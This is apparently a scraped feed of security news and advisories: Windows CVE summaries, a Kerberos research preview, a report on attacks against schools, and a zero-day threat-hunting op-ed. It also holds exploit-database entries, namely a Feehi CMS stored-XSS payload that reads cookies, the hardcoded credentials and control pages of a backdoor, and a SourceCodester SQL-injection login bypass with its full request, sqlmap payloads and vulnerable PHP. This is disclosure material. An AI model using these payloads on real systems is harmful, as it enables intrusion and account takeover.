Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability. This CVE ID is unique from CVE-2022-35747.

CVE-2022-35769

Windows Defender Credential Guard Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-34705.

CVE-2022-35771

Windows Secure Socket Tunneling Protocol (SSTP) Denial of Service Vulnerability.

CVE-2022-34701

Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-34702, CVE-2022-34714, CVE-2022-35745, CVE-2022-35752, CVE-2022-35753, CVE-2022-35766, CVE-2022-35767.

CVE-2022-35794

Upcoming Black Hat USA presentation will examine the implications of Kerberos weaknesses for security on the local machine.

As the main authentication protocol for Windows enterprise networks, Kerberos has long been a favored hacking playground for security researchers and cybercriminals alike. While the focus has been on attacking Kerberos authentication to carry out remote exploits and aid in lateral movement across the network, new research explores how Kerberos can also be abused to great effect in carrying out a variety of local privilege escalation (LPE) attacks.

At the Black Hat USA conference this week in Las Vegas, James Forshaw, security researcher for Google Project Zero, and Nick Landers, head of adversarial R&D for NetSPI, plan to take the security discussion beyond the Kerberoasting and Golden/Silver ticket attack discussions that have dominated Kerberos security research in recent years. In the session "Elevating Kerberos to the Next Level," Forshaw and Landers will explore authentication bypasses, sandbox escapes, and arbitrary code execution in privileged processes.  

"James and I have both spent a lot of our time digging into Windows internals, and Kerberos is fundamental to network authentication between Windows systems. However, most of the existing research and tooling I've done focuses on remote exploitation — ignoring attack surfaces that exist on just a local machine," says Landers, who explained why the pair decided to dig deeper into design flaws in the way Kerberos does local authentication. "Through this, we've discovered many interesting flaws — some fixed and some not — that we're excited to share on Wednesday, along with the tooling we’ve built and knowledge we've gained over the last several months."

The tooling will help others in the security research community to inspect and manipulate Kerberos on local systems to build on the pair's research. The duo will also offer up some important detection and configuration advice to help security practitioners mitigate the risk of the flaws that they'll present.

From a bigger-picture perspective, Landers hopes that his talk can help bring further attention to Kerberos from the entire security world. He says that even though it is the recommended long-term solution for network authentication in Windows environment, replacing deprecated protocols like NetNTLM, security teams shouldn't assume that its more secure by default than the predecessors.

"Kerberos maintains an extremely large feature set, which continues to grow every year. Obscure functionality first designed in 1998, as well as brand-new code engineered for Windows 11, can both provide nuanced attack surfaces for LPE, security bypasses, or even RCE," he says. "Where there are more features to search, there is always greater opportunity to discover flaws."

In addition to offering practical mitigation steps, he hopes the talk will spur security and network administrators to brush up on their Kerberos knowledge to better harden their systems.

"Administrators should become more familiar with Kerberos to be able to apply best practice mitigations effectively. Specifically, since we consistently see the knowledge of attackers outpacing that of defenders when it comes to Kerberos internals," he says.

His talk will be one of several eye-opening identity and access management-related research presented at Black Hat this week. Some discussions up for exploration include how hybrid cloud IAM deployments are leaving open flaws and misconfigurations ripe for attack and the way that attackers can utilize stolen PII to make it easier to conduct smishing attacks.

Abusing Kerberos for Local Privilege Escalation

Categories: News
Categories: Threat Intelligence
Tags: Education

Beyond spikes in detections, the education sector has dealt with an onslaught of attacks ranging from spyware and denial of service tools to ransomware.



(Read more...)




The post Education hammered by exploits and backdoors in 2021 and 2022 appeared first on Malwarebytes Labs.

In May of 2021, education underwent a siege of exploit attempts using the vulnerability CVE-2021-21551, which exploits a Dell system driver bug and helps attackers to gain access to a network. Considering that many schools across the United States use Dell hardware, it’s understandable to see such a large amount of this exploit. 

In fact, both Rockland Schools in Massachusetts and Visalia USD in California were hit with ransomware attacks during this period. The states that detected this threat the most were Minnesota and Michigan, with Detroit being the biggest target in the US. 

In September of 2021, there was a spike of the malicious setting, **RiskwareTool.IFEOHijack**, with detections having increased from July 2021 onward. This threat is flagged when malware modifies a registry setting that changes the default Windows debugger to a malware executable. It is a red flag that needs to be investigated immediately. Unfortunately, it doesn’t pinpoint which malware made the modification, but the increased presence of this threat, especially in Oklahoma and Washington State, calls for deeper threat hunting on the victims' networks. During the same period, a spike in exploit detections was observed and Howard University was breached.

The Trojan TechSupportScam covers an array of applications all designed to fool users into calling a “tech support” number to solve a problem created by the application, such as a blue screen, error message, activation alert, etc. These tools started spiking in January of 2022.  Educational institutions in New Jersey have had to deal with this threat more than any other state, however the public school district of Albuquerque, NM suffered a breach during the same month that could have been influenced by this spike in scams. Students and staff likely encountered these threats when installing risky software and/or visiting shady sites.

Finally, Pennsylvania schools have been dealing with an active campaign of backdoors, specifically QBot, since March of 2022, which will likely result in greater infections during the rest of 2022.

Beyond spikes in detections, the education sector has dealt with an onslaught of attacks ranging from spyware and denial of service tools to ransomware.  Throughout the year, almost every month has a report of an educational institution under attack. The first half of 2021 saw attacks against schools in Florida, New York, Oregon, Massachusetts, and California, while the second half saw attacks against Texas, Washington D.C., Wisconsin, and Illinois. The biggest attack of 2022, so far, would be the breach of Austin Peay State University in April, though time will tell if that remains true.

The education industry has the largest userbase out of all industries, considering the constant rotation of students and faculty. Therefore, the greatest threat to these organizations are the users themselves, who may download their own applications, visit dangerous websites, and even make system modifications to get around monitoring tools.

**Recommendations for education**

Our recommendation for this sector includes keeping an eye out for all new exploits that might affect your organization, especially commonly used systems. In a lot of cases, organizations may have a difficult time updating quickly, because of operational needs, but in the case of schools, a single vulnerability might be duplicated across 99% of its endpoints, which turns each of those systems into backdoors for the bad guys. So, making vulnerability patching one of the highest priorities will reduce attacks and decrease malicious file installation.

Next, systems that have been infected may leave behind artifacts of its operations, for example the IFEOHijack registry setting. Additionally, threats that may be installed on day one, might not activate until a user does something specific, or a certain date comes around, allowing the threat to hide in the meantime. To combat this threat, consider creating a secure, default system image that can be easily duplicated to endpoints, returning them to a default state. While this is likely already done by many schools every year, consider increasing the frequency to every quarter, maybe even every month, and have students save their files on cloud-based storage solutions.

By utilizing a default image, an organization can erase hidden malware, reset modified settings, and provide confidence in quickly isolating or wiping out an infected system. For the education industry, it’s not so much about what threats are actively targeting schools, but rather what threats have been left behind, that open doors for other, future attacks.

Education hammered by exploits and backdoors in 2021 and 2022

Feehi CMS version 2.1.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Feehi CMS 2.1.1 - Stored Cross-Site Scripting (XSS)# Date: 02-08-2022# Exploit Author: Shivam Singh# Vendor Homepage: https://feehi.com/# Software Link: https://github.com/liufee/cms#Profile Link: https://www.linkedin.com/in/shivam-singh-3906b0203/# Version: 2.1.1 (REQUIRED)# Tested on: Linux, Windows, Docker# CVE : CVE-2022-34140# Proof of Concept:1-Sing-up https://localhost.cms.feehi/2-Inject The XSS Payload in Username:"><script>alert(document.cookie)</script> fill all required fields andclick the SignUp button3-Login to Your Account, Go to any article page then XSS will trigger.

Feehi CMS 2.1.1 Cross Site Scripting

Backdoor.Win32.Guptachar.20 malware suffers from an insecure credential storage vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/857999d2306f257b80d1b8f6a51ae8b0.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Guptachar.20Vulnerability: Insecure Credential StorageDescription: The malware runs a web server on TCP port 2015 (default) and uses BASIC authentication. The credentials "hacker01:imchampgr8" get stored in a .NFO information file named "GPTCR.NFO" under Windows dir base64 encoded and hidden among many junk NULL bytes.Family: GuptacharType: PE32MD5: 857999d2306f257b80d1b8f6a51ae8b0Vuln ID: MVID-2022-0631Dropped files: GPTCR2.exe Disclosure: 08/08/2022Exploit/PoC:import base64base64.b64decode("aGFja2VyMDE6aW1jaGFtcGdyOA==")b'hacker01:imchampgr8'Web URLs available on the infected host.http://192.168.18.125:2015/execute.htmlhttp://192.168.18.125:2015/browse.htmlhttp://192.168.18.125:2015/upload.htmlhttp://192.168.18.125:2015/screenshot.htmlhttp://192.168.18.125:2015/keylog.htmlhttp://192.168.18.125:2015/display.htmlhttp://192.168.18.125:2015/shutdown.htmlhttp://192.168.18.125:2015/servopts.htmlDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Guptachar.20 MVID-2022-0631 Insecure Credential Storage

Machine-learning algorithms alone may miss signs of a successful attack on your organization.

Zero-day attacks that exploit unpatched software vulnerabilities saw exponential growth last year. According to cybersecurity researchers like the Zero-Day Tracking Project, 2021 saw more than 80 zero-day exploits recorded, versus 36 in 2000. There are already 22 such exploits on record for the first half of 2022.

As soon as a vulnerability becomes known, cybercriminals rush to exploit it before the software developer can write, test, and release a patch. That window may be hours, but more likely days or weeks long. So, it's important that you have threat hunters — humans, not machine-learning algorithms — scouring your infrastructure proactively for signs of a successful attack.

The risk of falling victim to a zero-day attack is considerable, and the consequences real. One study from the Ponemon Institute found that 80% of successful data breaches originated with zero-day exploits. The vulnerabilities exploited are found in software common to the enterprise, including Microsoft Windows and Office, Google Chrome, Adobe Reader, Apple iOS, and Linux.

With 2021's Apache Log4j Java-based vulnerability, we can add hundreds of millions of devices and a wide range of websites, consumer and enterprise services, and applications to the list.

Step one in protecting every organization is to practice excellent IT hygiene — keep up to date on patching and updating all software. It's the back-to-basics measure that so many companies love to overlook or postpone. Granted, it can be time and resource consuming to test and deploy software patches, and the process can disrupt business operations. But it's a critical safeguard and far less costly than a data breach.

**The Invisibility of Newness**

A strong perimeter and signature-based edge controls like anti-virus software and intrusion prevention do not provide complete protection. That's because they can only detect known threats. They are blind to the footprints of zero-day attacks, when the cybercriminals are the first to uncover and exploit a software vulnerability. That's why zero-day exploit kits carry very high price tags on the black market, running from tens of thousands of dollars up to millions. They work that well.

Once a cybercriminal has used a zero-day exploit to penetrate a network unseen, they can take their time and deploy their weapon of choice, from viruses and worms to malware and ransomware to remote code execution. They can move laterally in the network, steal identities, and steal data. As long as you don't know they're there, it's like handing over the keys to the crown jewels.

**The Role of Threat Hunting**

It's that invisibility that makes proactive threat hunting an essential component of the layered approach to security. It's made possible in part because we have been smart about using machine learning to free up scarce cybersecurity people resources by reducing the number of alerts needing human intervention by 90%. Some in the industry have taken this success to mean that humans can be phased out of the security equation by algorithms, and that algorithms can do the work for us, including threat hunting.

Machine learning does bring significant advantages to cybersecurity management, but it will never completely replace humans in the security operations center. Machines handle high-volume tasks like eliminating false positives and repetitions extremely well. Machine learning may assist when you are hunting for known threats, including advanced and "low-and-slow" threats, where you know what indicators of compromise (IoCs) to look for.

However, human intelligence, intuition, strategic thinking, and creative problem solving are essential in proactive zero-day threat hunting where the IoCs are unknown and the hunter is looking for the subtle indications that another human is maliciously active in your environment.

This approach is research intensive. The analyst may create a hypothesis and then validate it based on observed patterns or anomalous activity in security data logs and user and entity behavioral analysis (UEBA) logs. According to CISA, these can include failed file modifications, increased CPU activity, inability to access files, unusual network communications, compromised administrator privileges, credentials theft, increases in database read volumes, and irregular geographical access.

Companies can develop threat hunting skills in-house or acquire them as a managed service. Either way, these human defenders and their proactive threat hunting expertise are the new elites in the security industry. Supported by comprehensive log data, threat intelligence, and tools like the MITRE ATT&CK knowledge base, human threat hunters are essential to combatting zero-day attacks, multistage attacks, and devious, low-and-slow hackers.

Human Threat Hunters Are Essential to Thwarting Zero-Day Attacks

A vulnerability was found in SourceCodester Employee Management System. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /process/aprocess.php. The manipulation of the argument mailuid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-205837 was assigned to this vulnerability.

**SourceCodester Employee Management System aprocess.php SQL Injection****Vendor Homepage:**

https://www.sourcecodester.com/php/14432/employee-management-system-using-php.html

**Source Code Download：**

https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip

**Proof of Concept**

Step 1: Open the URL http://127.0.0.1/ems/alogin.html

Step 2: Use payload admin' or 1 # in Email and anything in Password

Step 3: login success

**Malicious Request.**

    POST /ems/process/aprocess.php HTTP/1.1
    Host: 127.0.0.1
    Content-Length: 40
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36 Edg/104.0.1293.47
    Referer: http://192.168.88.195/ems/alogin.html
    Accept-Encoding: gzip, deflate
    Connection: close
    
    mailuid=admin' or 1 #&pwd=123&login-submit=Login
    

**Sqlmap**

    Parameter: mailuid (POST)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
        Payload: mailuid=-6002' OR 3766=3766#&pwd=123&login-submit=Login
    
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: mailuid=admin' AND (SELECT 4206 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(4206=4206,1))),0x7176786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sPJa&pwd=123&login-submit=Login
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: mailuid=admin' AND (SELECT 1085 FROM (SELECT(SLEEP(5)))gGqt)-- XrcV&pwd=123&login-submit=Login
    

**code**

/process/aprocess.php line 5-12，

    $email = $_POST['mailuid'];
    $password = $_POST['pwd'];
    
    $sql = "SELECT * from `alogin` WHERE email = '$email' AND password = '$password'";
    
    //echo "$sql";
    
    $result = mysqli_query($conn, $sql);

Tag

#windows